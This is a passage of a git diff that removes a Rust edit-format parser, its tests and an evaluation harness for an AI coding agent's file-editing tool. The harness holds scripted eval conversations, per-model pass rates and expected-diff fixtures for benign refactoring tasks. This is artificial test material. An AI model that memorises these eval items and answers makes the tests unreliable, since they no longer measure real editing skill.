">>>>>>> REPLACE"; -const SONNET_PARAMETER_INVOKE_1: &str = "\n"; -const SONNET_PARAMETER_INVOKE_2: &str = ""; -const SONNET_PARAMETER_INVOKE_3: &str = ""; -const END_TAGS: [&str; 6] = [ - OLD_TEXT_END_TAG, - NEW_TEXT_END_TAG, - EDITS_END_TAG, - SONNET_PARAMETER_INVOKE_1, // Remove these after switching to streaming tool call - SONNET_PARAMETER_INVOKE_2, - SONNET_PARAMETER_INVOKE_3, -]; - -#[derive(Debug)] -pub enum EditParserEvent { - OldTextChunk { - chunk: String, - done: bool, - line_hint: Option, - }, - NewTextChunk { - chunk: String, - done: bool, - }, -} - -#[derive( - Clone, Debug, Default, PartialEq, Eq, Add, AddAssign, Serialize, Deserialize, JsonSchema, -)] -pub struct EditParserMetrics { - pub tags: usize, - pub mismatched_tags: usize, -} - -#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum EditFormat { - /// XML-like tags: - /// ... - /// ... - XmlTags, - /// Diff-fenced format, in which: - /// - Text before the SEARCH marker is ignored - /// - Fences are optional - /// - Line hint is optional. - /// - /// Example: - /// - /// ```diff - /// <<<<<<< SEARCH line=42 - /// ... - /// ======= - /// ... 
- /// >>>>>>> REPLACE - /// ``` - DiffFenced, -} - -impl FromStr for EditFormat { - type Err = anyhow::Error; - - fn from_str(s: &str) -> anyhow::Result { - match s.to_lowercase().as_str() { - "xml_tags" | "xml" => Ok(EditFormat::XmlTags), - "diff_fenced" | "diff-fenced" | "diff" => Ok(EditFormat::DiffFenced), - _ => bail!("Unknown EditFormat: {}", s), - } - } -} - -impl EditFormat { - /// Return an optimal edit format for the language model - pub fn from_model(model: Arc) -> anyhow::Result { - if model.provider_id().0 == "google" || model.id().0.to_lowercase().contains("gemini") { - Ok(EditFormat::DiffFenced) - } else { - Ok(EditFormat::XmlTags) - } - } - - /// Return an optimal edit format for the language model, - /// with the ability to override it by setting the - /// `ZED_EDIT_FORMAT` environment variable - #[allow(dead_code)] - pub fn from_env(model: Arc) -> anyhow::Result { - let default = EditFormat::from_model(model)?; - std::env::var("ZED_EDIT_FORMAT").map_or(Ok(default), |s| EditFormat::from_str(&s)) - } -} - -pub trait EditFormatParser: Send + std::fmt::Debug { - fn push(&mut self, chunk: &str) -> SmallVec<[EditParserEvent; 1]>; - fn take_metrics(&mut self) -> EditParserMetrics; -} - -#[derive(Debug)] -pub struct XmlEditParser { - state: XmlParserState, - buffer: String, - metrics: EditParserMetrics, -} - -#[derive(Debug, PartialEq)] -enum XmlParserState { - Pending, - WithinOldText { start: bool, line_hint: Option }, - AfterOldText, - WithinNewText { start: bool }, -} - -#[derive(Debug)] -pub struct DiffFencedEditParser { - state: DiffParserState, - buffer: String, - metrics: EditParserMetrics, -} - -#[derive(Debug, PartialEq)] -enum DiffParserState { - Pending, - WithinSearch { start: bool, line_hint: Option }, - WithinReplace { start: bool }, -} - -/// Main parser that delegates to format-specific parsers -pub struct EditParser { - parser: Box, -} - -impl XmlEditParser { - pub fn new() -> Self { - XmlEditParser { - state: XmlParserState::Pending, - 
buffer: String::new(), - metrics: EditParserMetrics::default(), - } - } - - fn find_end_tag(&self) -> Option> { - let (tag, start_ix) = END_TAGS - .iter() - .flat_map(|tag| Some((tag, self.buffer.find(tag)?))) - .min_by_key(|(_, ix)| *ix)?; - Some(start_ix..start_ix + tag.len()) - } - - fn ends_with_tag_prefix(&self) -> bool { - let mut end_prefixes = END_TAGS - .iter() - .flat_map(|tag| (1..tag.len()).map(move |i| &tag[..i])) - .chain(["\n"]); - end_prefixes.any(|prefix| self.buffer.ends_with(&prefix)) - } - - fn parse_line_hint(&self, tag: &str) -> Option { - use std::sync::LazyLock; - static LINE_HINT_REGEX: LazyLock = - LazyLock::new(|| Regex::new(r#"line=(?:"?)(\d+)"#).unwrap()); - - LINE_HINT_REGEX - .captures(tag) - .and_then(|caps| caps.get(1)) - .and_then(|m| m.as_str().parse::().ok()) - } -} - -impl EditFormatParser for XmlEditParser { - fn push(&mut self, chunk: &str) -> SmallVec<[EditParserEvent; 1]> { - self.buffer.push_str(chunk); - - let mut edit_events = SmallVec::new(); - loop { - match &mut self.state { - XmlParserState::Pending => { - if let Some(start) = self.buffer.find("') { - let tag_end = start + tag_end + 1; - let tag = &self.buffer[start..tag_end]; - let line_hint = self.parse_line_hint(tag); - self.buffer.drain(..tag_end); - self.state = XmlParserState::WithinOldText { - start: true, - line_hint, - }; - } else { - break; - } - } else { - break; - } - } - XmlParserState::WithinOldText { start, line_hint } => { - if !self.buffer.is_empty() { - if *start && self.buffer.starts_with('\n') { - self.buffer.remove(0); - } - *start = false; - } - - let line_hint = *line_hint; - if let Some(tag_range) = self.find_end_tag() { - let mut chunk = self.buffer[..tag_range.start].to_string(); - if chunk.ends_with('\n') { - chunk.pop(); - } - - self.metrics.tags += 1; - if &self.buffer[tag_range.clone()] != OLD_TEXT_END_TAG { - self.metrics.mismatched_tags += 1; - } - - self.buffer.drain(..tag_range.end); - self.state = XmlParserState::AfterOldText; - 
edit_events.push(EditParserEvent::OldTextChunk { - chunk, - done: true, - line_hint, - }); - } else { - if !self.ends_with_tag_prefix() { - edit_events.push(EditParserEvent::OldTextChunk { - chunk: mem::take(&mut self.buffer), - done: false, - line_hint, - }); - } - break; - } - } - XmlParserState::AfterOldText => { - if let Some(start) = self.buffer.find("") { - self.buffer.drain(..start + "".len()); - self.state = XmlParserState::WithinNewText { start: true }; - } else { - break; - } - } - XmlParserState::WithinNewText { start } => { - if !self.buffer.is_empty() { - if *start && self.buffer.starts_with('\n') { - self.buffer.remove(0); - } - *start = false; - } - - if let Some(tag_range) = self.find_end_tag() { - let mut chunk = self.buffer[..tag_range.start].to_string(); - if chunk.ends_with('\n') { - chunk.pop(); - } - - self.metrics.tags += 1; - if &self.buffer[tag_range.clone()] != NEW_TEXT_END_TAG { - self.metrics.mismatched_tags += 1; - } - - self.buffer.drain(..tag_range.end); - self.state = XmlParserState::Pending; - edit_events.push(EditParserEvent::NewTextChunk { chunk, done: true }); - } else { - if !self.ends_with_tag_prefix() { - edit_events.push(EditParserEvent::NewTextChunk { - chunk: mem::take(&mut self.buffer), - done: false, - }); - } - break; - } - } - } - } - edit_events - } - - fn take_metrics(&mut self) -> EditParserMetrics { - std::mem::take(&mut self.metrics) - } -} - -impl DiffFencedEditParser { - pub fn new() -> Self { - DiffFencedEditParser { - state: DiffParserState::Pending, - buffer: String::new(), - metrics: EditParserMetrics::default(), - } - } - - fn ends_with_diff_marker_prefix(&self) -> bool { - let diff_markers = [SEPARATOR_MARKER, REPLACE_MARKER]; - let mut diff_prefixes = diff_markers - .iter() - .flat_map(|marker| (1..marker.len()).map(move |i| &marker[..i])) - .chain(["\n"]); - diff_prefixes.any(|prefix| self.buffer.ends_with(&prefix)) - } - - fn parse_line_hint(&self, search_line: &str) -> Option { - use regex::Regex; - use 
std::sync::LazyLock; - static LINE_HINT_REGEX: LazyLock = - LazyLock::new(|| Regex::new(r#"line=(?:"?)(\d+)"#).unwrap()); - - LINE_HINT_REGEX - .captures(search_line) - .and_then(|caps| caps.get(1)) - .and_then(|m| m.as_str().parse::().ok()) - } -} - -impl EditFormatParser for DiffFencedEditParser { - fn push(&mut self, chunk: &str) -> SmallVec<[EditParserEvent; 1]> { - self.buffer.push_str(chunk); - - let mut edit_events = SmallVec::new(); - loop { - match &mut self.state { - DiffParserState::Pending => { - if let Some(diff) = self.buffer.find(SEARCH_MARKER) { - let search_end = diff + SEARCH_MARKER.len(); - if let Some(newline_pos) = self.buffer[search_end..].find('\n') { - let search_line = &self.buffer[diff..search_end + newline_pos]; - let line_hint = self.parse_line_hint(search_line); - self.buffer.drain(..search_end + newline_pos + 1); - self.state = DiffParserState::WithinSearch { - start: true, - line_hint, - }; - } else { - break; - } - } else { - break; - } - } - DiffParserState::WithinSearch { start, line_hint } => { - if !self.buffer.is_empty() { - if *start && self.buffer.starts_with('\n') { - self.buffer.remove(0); - } - *start = false; - } - - let line_hint = *line_hint; - if let Some(separator_pos) = self.buffer.find(SEPARATOR_MARKER) { - let mut chunk = self.buffer[..separator_pos].to_string(); - if chunk.ends_with('\n') { - chunk.pop(); - } - - let separator_end = separator_pos + SEPARATOR_MARKER.len(); - if let Some(newline_pos) = self.buffer[separator_end..].find('\n') { - self.buffer.drain(..separator_end + newline_pos + 1); - self.state = DiffParserState::WithinReplace { start: true }; - edit_events.push(EditParserEvent::OldTextChunk { - chunk, - done: true, - line_hint, - }); - } else { - break; - } - } else { - if !self.ends_with_diff_marker_prefix() { - edit_events.push(EditParserEvent::OldTextChunk { - chunk: mem::take(&mut self.buffer), - done: false, - line_hint, - }); - } - break; - } - } - DiffParserState::WithinReplace { start } => { 
- if !self.buffer.is_empty() { - if *start && self.buffer.starts_with('\n') { - self.buffer.remove(0); - } - *start = false; - } - - if let Some(replace_pos) = self.buffer.find(REPLACE_MARKER) { - let mut chunk = self.buffer[..replace_pos].to_string(); - if chunk.ends_with('\n') { - chunk.pop(); - } - - self.buffer.drain(..replace_pos + REPLACE_MARKER.len()); - if let Some(newline_pos) = self.buffer.find('\n') { - self.buffer.drain(..newline_pos + 1); - } else { - self.buffer.clear(); - } - - self.state = DiffParserState::Pending; - edit_events.push(EditParserEvent::NewTextChunk { chunk, done: true }); - } else { - if !self.ends_with_diff_marker_prefix() { - edit_events.push(EditParserEvent::NewTextChunk { - chunk: mem::take(&mut self.buffer), - done: false, - }); - } - break; - } - } - } - } - edit_events - } - - fn take_metrics(&mut self) -> EditParserMetrics { - std::mem::take(&mut self.metrics) - } -} - -impl EditParser { - pub fn new(format: EditFormat) -> Self { - let parser: Box = match format { - EditFormat::XmlTags => Box::new(XmlEditParser::new()), - EditFormat::DiffFenced => Box::new(DiffFencedEditParser::new()), - }; - EditParser { parser } - } - - pub fn push(&mut self, chunk: &str) -> SmallVec<[EditParserEvent; 1]> { - self.parser.push(chunk) - } - - pub fn finish(mut self) -> EditParserMetrics { - self.parser.take_metrics() - } -} - -#[cfg(test)] -mod tests { - use super::*; - use indoc::indoc; - use rand::prelude::*; - use std::cmp; - - #[gpui::test(iterations = 1000)] - fn test_xml_single_edit(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - "originalupdated", - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "original".to_string(), - new_text: "updated".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_multiple_edits(mut rng: StdRng) { 
- let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - indoc! {" - - first old - first new - second old - second new - - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "first old".to_string(), - new_text: "first new".to_string(), - line_hint: None, - }, - Edit { - old_text: "second old".to_string(), - new_text: "second new".to_string(), - line_hint: None, - }, - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 4, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_edits_with_extra_text(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - indoc! {" - ignore this - contentextra stuffupdated contenttrailing data - more text second item - middle textmodified second itemend - third caseimproved third case with trailing text - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "content".to_string(), - new_text: "updated content".to_string(), - line_hint: None, - }, - Edit { - old_text: "second item".to_string(), - new_text: "modified second item".to_string(), - line_hint: None, - }, - Edit { - old_text: "third case".to_string(), - new_text: "improved third case".to_string(), - line_hint: None, - }, - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 6, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_edits_with_closing_parameter_invoke(mut rng: StdRng) { - // This case is a regression with Claude Sonnet 4.5. - // Sometimes Sonnet thinks that it's doing a tool call - // and closes its response with '' - // instead of properly closing - - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - indoc! 
{" - some textupdated text - more textupd - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "some text".to_string(), - new_text: "updated text".to_string(), - line_hint: None, - }, - Edit { - old_text: "more text".to_string(), - new_text: "upd".to_string(), - line_hint: None, - }, - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 4, - mismatched_tags: 2 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_nested_tags(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - "code with nested elementsnew content", - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "code with nested elements".to_string(), - new_text: "new content".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_empty_old_and_new_text(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - "", - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "".to_string(), - new_text: "".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_xml_multiline_content(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - "line1\nline2\nline3line1\nmodified line2\nline3", - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "line1\nline2\nline3".to_string(), - new_text: "line1\nmodified line2\nline3".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_mismatched_tags(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - 
parse_random_chunks( - // Reduced from an actual Sonnet 3.7 output - indoc! {" - - a - b - c - - - a - B - c - - - d - e - f - - - D - e - F - - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "a\nb\nc".to_string(), - new_text: "a\nB\nc".to_string(), - line_hint: None, - }, - Edit { - old_text: "d\ne\nf".to_string(), - new_text: "D\ne\nF".to_string(), - line_hint: None, - } - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 4, - mismatched_tags: 4 - } - ); - - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - // Reduced from an actual Opus 4 output - indoc! {" - - - Lorem - - - LOREM - - "}, - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "Lorem".to_string(), - new_text: "LOREM".to_string(), - line_hint: None, - },] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 1 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_diff_fenced_single_edit(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! {" - <<<<<<< SEARCH - original text - ======= - updated text - >>>>>>> REPLACE - "}, - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "original text".to_string(), - new_text: "updated text".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_diff_fenced_with_markdown_fences(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! 
{" - ```diff - <<<<<<< SEARCH - from flask import Flask - ======= - import math - from flask import Flask - >>>>>>> REPLACE - ``` - "}, - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "from flask import Flask".to_string(), - new_text: "import math\nfrom flask import Flask".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_diff_fenced_multiple_edits(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! {" - <<<<<<< SEARCH - first old - ======= - first new - >>>>>>> REPLACE - - <<<<<<< SEARCH - second old - ======= - second new - >>>>>>> REPLACE - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "first old".to_string(), - new_text: "first new".to_string(), - line_hint: None, - }, - Edit { - old_text: "second old".to_string(), - new_text: "second new".to_string(), - line_hint: None, - }, - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_mixed_formats(mut rng: StdRng) { - // Test XML format parser only parses XML tags - let mut xml_parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - indoc! {" - xml style oldxml style new - - <<<<<<< SEARCH - diff style old - ======= - diff style new - >>>>>>> REPLACE - "}, - &mut xml_parser, - &mut rng - ), - vec![Edit { - old_text: "xml style old".to_string(), - new_text: "xml style new".to_string(), - line_hint: None, - },] - ); - assert_eq!( - xml_parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - - // Test diff-fenced format parser only parses diff markers - let mut diff_parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! 
{" - xml style oldxml style new - - <<<<<<< SEARCH - diff style old - ======= - diff style new - >>>>>>> REPLACE - "}, - &mut diff_parser, - &mut rng - ), - vec![Edit { - old_text: "diff style old".to_string(), - new_text: "diff style new".to_string(), - line_hint: None, - },] - ); - assert_eq!( - diff_parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_diff_fenced_empty_sections(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! {" - <<<<<<< SEARCH - ======= - >>>>>>> REPLACE - "}, - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "".to_string(), - new_text: "".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_diff_fenced_with_line_hint(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - let edits = parse_random_chunks( - indoc! 
{" - <<<<<<< SEARCH line=42 - original text - ======= - updated text - >>>>>>> REPLACE - "}, - &mut parser, - &mut rng, - ); - assert_eq!( - edits, - vec![Edit { - old_text: "original text".to_string(), - line_hint: Some(42), - new_text: "updated text".to_string(), - }] - ); - } - #[gpui::test(iterations = 100)] - fn test_xml_line_hints(mut rng: StdRng) { - // Line hint is a single quoted line number - let mut parser = EditParser::new(EditFormat::XmlTags); - - let edits = parse_random_chunks( - r#" - original code - updated code"#, - &mut parser, - &mut rng, - ); - - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "original code"); - assert_eq!(edits[0].line_hint, Some(23)); - assert_eq!(edits[0].new_text, "updated code"); - - // Line hint is a single unquoted line number - let mut parser = EditParser::new(EditFormat::XmlTags); - - let edits = parse_random_chunks( - r#" - original code - updated code"#, - &mut parser, - &mut rng, - ); - - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "original code"); - assert_eq!(edits[0].line_hint, Some(45)); - assert_eq!(edits[0].new_text, "updated code"); - - // Line hint is a range - let mut parser = EditParser::new(EditFormat::XmlTags); - - let edits = parse_random_chunks( - r#" - original code - updated code"#, - &mut parser, - &mut rng, - ); - - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "original code"); - assert_eq!(edits[0].line_hint, Some(23)); - assert_eq!(edits[0].new_text, "updated code"); - - // No line hint - let mut parser = EditParser::new(EditFormat::XmlTags); - let edits = parse_random_chunks( - r#" - old - new"#, - &mut parser, - &mut rng, - ); - - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "old"); - assert_eq!(edits[0].line_hint, None); - assert_eq!(edits[0].new_text, "new"); - } - - #[derive(Default, Debug, PartialEq, Eq)] - struct Edit { - old_text: String, - new_text: String, - line_hint: Option, - } - - fn parse_random_chunks(input: &str, parser: 
&mut EditParser, rng: &mut StdRng) -> Vec { - let chunk_count = rng.random_range(1..=cmp::min(input.len(), 50)); - let mut chunk_indices = (0..input.len()).choose_multiple(rng, chunk_count); - chunk_indices.sort(); - chunk_indices.push(input.len()); - - let mut old_text = Some(String::new()); - let mut new_text = None; - let mut pending_edit = Edit::default(); - let mut edits = Vec::new(); - let mut last_ix = 0; - for chunk_ix in chunk_indices { - for event in parser.push(&input[last_ix..chunk_ix]) { - match event { - EditParserEvent::OldTextChunk { - chunk, - done, - line_hint, - } => { - old_text.as_mut().unwrap().push_str(&chunk); - if done { - pending_edit.old_text = old_text.take().unwrap(); - pending_edit.line_hint = line_hint; - new_text = Some(String::new()); - } - } - EditParserEvent::NewTextChunk { chunk, done } => { - new_text.as_mut().unwrap().push_str(&chunk); - if done { - pending_edit.new_text = new_text.take().unwrap(); - edits.push(pending_edit); - pending_edit = Edit::default(); - old_text = Some(String::new()); - } - } - } - } - last_ix = chunk_ix; - } - - if new_text.is_some() { - pending_edit.new_text = new_text.take().unwrap(); - edits.push(pending_edit); - } - - edits - } -} diff --git a/crates/agent/src/edit_agent/evals.rs b/crates/agent/src/edit_agent/evals.rs deleted file mode 100644 index 7e4f314afd0db2..00000000000000 --- a/crates/agent/src/edit_agent/evals.rs +++ /dev/null @@ -1,1701 +0,0 @@ -use super::*; -use crate::{ - AgentTool, EditFileMode, EditFileTool, EditFileToolInput, GrepTool, GrepToolInput, - ListDirectoryTool, ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, -}; -use Role::*; -use client::{Client, RefreshLlmTokenListener, UserStore}; -use eval_utils::{EvalOutput, EvalOutputProcessor, OutcomeKind}; -use fs::FakeFs; -use futures::{FutureExt, future::LocalBoxFuture}; -use gpui::{AppContext, TestAppContext}; -use http_client::StatusCode; -use indoc::{formatdoc, indoc}; -use language_model::{ - LanguageModelRegistry, 
LanguageModelToolResult, LanguageModelToolResultContent, - LanguageModelToolUse, LanguageModelToolUseId, SelectedModel, -}; -use project::Project; -use prompt_store::{ProjectContext, WorktreeContext}; -use rand::prelude::*; -use reqwest_client::ReqwestClient; -use serde_json::json; -use std::{ - fmt::{self, Display}, - path::Path, - str::FromStr, - time::Duration, -}; -use util::path; - -#[derive(Default, Clone, Debug)] -struct EditAgentOutputProcessor { - mismatched_tag_threshold: f32, - cumulative_tags: usize, - cumulative_mismatched_tags: usize, - eval_outputs: Vec>, -} - -fn mismatched_tag_threshold(mismatched_tag_threshold: f32) -> EditAgentOutputProcessor { - EditAgentOutputProcessor { - mismatched_tag_threshold, - cumulative_tags: 0, - cumulative_mismatched_tags: 0, - eval_outputs: Vec::new(), - } -} - -#[derive(Clone, Debug)] -struct EditEvalMetadata { - tags: usize, - mismatched_tags: usize, -} - -impl EvalOutputProcessor for EditAgentOutputProcessor { - type Metadata = EditEvalMetadata; - - fn process(&mut self, output: &EvalOutput) { - if matches!(output.outcome, OutcomeKind::Passed | OutcomeKind::Failed) { - self.cumulative_mismatched_tags += output.metadata.mismatched_tags; - self.cumulative_tags += output.metadata.tags; - self.eval_outputs.push(output.clone()); - } - } - - fn assert(&mut self) { - let mismatched_tag_ratio = - self.cumulative_mismatched_tags as f32 / self.cumulative_tags as f32; - if mismatched_tag_ratio > self.mismatched_tag_threshold { - for eval_output in &self.eval_outputs { - println!("{}", eval_output.data); - } - panic!( - "Too many mismatched tags: {:?}", - self.cumulative_mismatched_tags - ); - } - } -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_extract_handle_command_output() { - // Test how well agent generates multiple edit hunks. 
- // - // Model | Pass rate - // ----------------------------|---------- - // claude-3.7-sonnet | 0.99 (2025-06-14) - // claude-sonnet-4 | 0.97 (2025-06-14) - // gemini-2.5-pro-06-05 | 0.98 (2025-06-16) - // gemini-2.5-flash | 0.11 (2025-05-22) - - let input_file_path = "root/blame.rs"; - let input_file_content = include_str!("evals/fixtures/extract_handle_command_output/before.rs"); - let possible_diffs = vec![ - include_str!("evals/fixtures/extract_handle_command_output/possible-01.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-02.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-03.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-04.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-05.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-06.diff"), - include_str!("evals/fixtures/extract_handle_command_output/possible-07.diff"), - ]; - let edit_description = "Extract `handle_command_output` method from `run_git_blame`."; - eval_utils::eval(100, 0.95, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(formatdoc! {" - Read the `{input_file_path}` file and extract a method in - the final stanza of `run_git_blame` to deal with command failures, - call it `handle_command_output` and take the std::process::Output as the only parameter. - Do not document the method and do not add any comments. - - Add it right next to `run_git_blame` and copy it verbatim from `run_git_blame`. 
- "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - input_file_content, - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::assert_diff_any(possible_diffs.clone()), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_delete_run_git_blame() { - // Model | Pass rate - // ----------------------------|---------- - // claude-3.7-sonnet | 1.0 (2025-06-14) - // claude-sonnet-4 | 0.96 (2025-06-14) - // gemini-2.5-pro-06-05 | 1.0 (2025-06-16) - // gemini-2.5-flash | - - let input_file_path = "root/blame.rs"; - let input_file_content = include_str!("evals/fixtures/delete_run_git_blame/before.rs"); - let output_file_content = include_str!("evals/fixtures/delete_run_git_blame/after.rs"); - let edit_description = "Delete the `run_git_blame` function."; - - eval_utils::eval(100, 0.95, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(formatdoc! {" - Read the `{input_file_path}` file and delete `run_git_blame`. Just that - one function, not its usages. 
- "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - input_file_content, - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::assert_eq(output_file_content), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_translate_doc_comments() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 1.0 (2025-06-14) - // claude-sonnet-4 | 1.0 (2025-06-14) - // gemini-2.5-pro-preview-03-25 | 1.0 (2025-05-22) - // gemini-2.5-flash-preview-04-17 | - - let input_file_path = "root/canvas.rs"; - let input_file_content = include_str!("evals/fixtures/translate_doc_comments/before.rs"); - let edit_description = "Translate all doc comments to Italian"; - - eval_utils::eval(200, 1., mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(formatdoc! {" - Read the {input_file_path} file and edit it (without overwriting it), - translating all the doc comments to italian. 
- "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - input_file_content, - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::judge_diff("Doc comments were translated to Italian"), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_use_wasi_sdk_in_compile_parser_to_wasm() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 0.96 (2025-06-14) - // claude-sonnet-4 | 0.11 (2025-06-14) - // gemini-2.5-pro-preview-latest | 0.99 (2025-06-16) - // gemini-2.5-flash-preview-04-17 | - - let input_file_path = "root/lib.rs"; - let input_file_content = - include_str!("evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs"); - let edit_description = "Update compile_parser_to_wasm to use wasi-sdk instead of emscripten"; - - eval_utils::eval(100, 0.95, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(formatdoc! {" - Read the `{input_file_path}` file and change `compile_parser_to_wasm` to use `wasi-sdk` instead of emscripten. - Use `ureq` to download the SDK for the current platform and architecture. - Extract the archive into a sibling of `lib` inside the `tree-sitter` directory in the cache_dir. - Compile the parser to wasm using the `bin/clang` executable (or `bin/clang.exe` on windows) - that's inside of the archive. - Don't re-download the SDK if that executable already exists. 
